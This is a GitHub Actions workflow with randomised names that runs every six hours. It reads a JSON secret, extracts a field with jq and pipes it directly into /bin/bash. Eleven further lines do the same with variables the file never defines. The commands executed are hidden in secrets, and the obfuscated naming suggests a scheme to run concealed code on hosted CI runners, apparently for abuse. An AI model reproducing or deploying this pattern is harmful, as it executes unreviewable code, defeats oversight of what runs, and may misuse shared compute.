name: yangxiong19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '35 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yangxiong19871010
        env:
          haxo449: ${{ secrets.haxo449 }}
        run: |
          echo $haxo449 | jq -r .uo1 | /bin/bash
          echo $xraai388 | jq -r .qksds0 | /bin/bash
          echo $b8821 | jq -r .iohyl2177 | /bin/bash
          echo $bhw58 | jq -r .sxpe7 | /bin/bash
          echo $ola9 | jq -r .v4 | /bin/bash
          echo $dj0 | jq -r .x4517 | /bin/bash
          echo $xmglw21 | jq -r .sv1 | /bin/bash
          echo $yltx9 | jq -r .aqb8739 | /bin/bash
          echo $q6 | jq -r .r7 | /bin/bash
          echo $lcj110 | jq -r .ykc0951 | /bin/bash
          echo $mlqhk1 | jq -r .vtzv488 | /bin/bash
          echo $jifj51796 | jq -r .etdqo1884 | /bin/bash

